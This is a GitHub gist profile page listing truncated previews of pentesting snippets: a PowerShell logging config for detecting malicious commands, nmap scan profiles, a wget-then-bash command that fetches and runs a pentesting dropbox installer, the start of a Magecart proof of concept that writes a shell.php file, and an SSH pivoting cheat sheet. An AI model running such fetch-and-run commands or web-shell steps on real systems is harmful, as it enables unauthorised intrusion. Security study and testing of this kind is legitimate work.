Skip to content

Instantly share code, notes, and snippets.

View sec-js's full-sized avatar

sec-js

13 followers · 24 following
  • Dallas texas
View GitHub Profile
@sec-js
sec-js / PowerShell Command Line Logging
Created December 12, 2019 21:48 — forked from gfoss/PowerShell Command Line Logging
Detect and alert on nefarious PowerShell command line activity
# PowerShell Audit Logging for LogRhythm SIEM - 2015
# For detecting dangerous PowerShell Commands/Functions
Log Source Type:
MS Event Log for Win7/Win8/2008/2012 - PowerShell
Add this file to your PowerShell directory to enable verbose command line audit logging
profile.ps1
$LogCommandHealthEvent = $true
$LogCommandLifeCycleEvent = $true
@sec-js
sec-js / PowerShell Command Line Logging
Created December 12, 2019 21:48 — forked from gfoss/PowerShell Command Line Logging
Detect and alert on nefarious PowerShell command line activity
# PowerShell Audit Logging for LogRhythm SIEM - 2015
# For detecting dangerous PowerShell Commands/Functions
Log Source Type:
MS Event Log for Win7/Win8/2008/2012 - PowerShell
Add this file to your PowerShell directory to enable verbose command line audit logging
profile.ps1
$LogCommandHealthEvent = $true
$LogCommandLifeCycleEvent = $true
@sec-js
sec-js / tipandoneliners.md
Last active November 28, 2020 09:24
stuff

THC's favourite Tips, Tricks & Hacks (Cheat Sheet)

Available at https://tiny.cc/thctricks

A collection of our favourite tricks. Many of those tricks are not from us. We merely collect them.

We show the tricks 'as is' without any explanation why they work. You need to know Linux to understand how and why they work.

Got tricks? Send them to root@thc.org or submit a pull request.

@sec-js
sec-js / darkmaster.sh.txt
Created March 4, 2020 22:06
#!/bin/bash
# remastersys script to make an installable livecd/dvd from a Debian installed
# and customized system
#
#
# Created by Tony "Fragadelic" Brijeski
#
# Copyright 2007-2012 Under the GNU GPL2 License
#
@sec-js
sec-js / nmap scanning profiles.txt
Created March 4, 2020 22:07
Available profiles
Fast scan
-F -T4 --max-retries 1
Web scan
-p- -sV --version-all --script "http-* and not(dos or brute)"
Full Service Scan
-sV --version-all -p- -sT
SMB Scan
@sec-js
sec-js / drop
Created March 11, 2020 19:08
drop
wget https://raw.githubusercontent.com/jdksec/RpiPentestingDropbox/master/InstallPiDropbox.sh
bash ./InstallPiDropbox.sh
@sec-js
sec-js / kali-gnome.sh
Created March 24, 2020 22:26
#!/bin/bash
#
# WARNING WARNING WARNING WARNING WARNING
#
# Run only under X11 sessions
#
# WARNING WARNING WARNING WARNING WARNING
. helper.sh
@sec-js
sec-js / Magecartpoc.txt
Created April 11, 2020 00:17
Exploit Steps
First, in the "app" directory run `php -a`
Then run the following commands:
```
include 'logger-class.php';
$logger = new Logger();
$logger->filename = "./shell.php";
@sec-js
sec-js / XWin.0.log.md
Last active August 25, 2020 14:04
XWin.0.log

Welcome to the XWin X Server Vendor: Moba/X Release: 1.20.4.0 OS: Windows 10 [Windows NT 10.0 build 18363] (WoW64) Package: version built 2019-03-16

XWin was started with the following command line:

@sec-js
sec-js / SSHCheatSheet.txt
Created September 22, 2020 00:02
Ssh cheat sheet
SSH Cheat Sheet
SSH has several features that are useful during pentesting and auditing. This page aims to remind us of the syntax for the most useful features.
NB: This page does not attempt to replace the man page for pentesters, only to supplement it with some pertinent examples.
SOCKS Proxy
Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):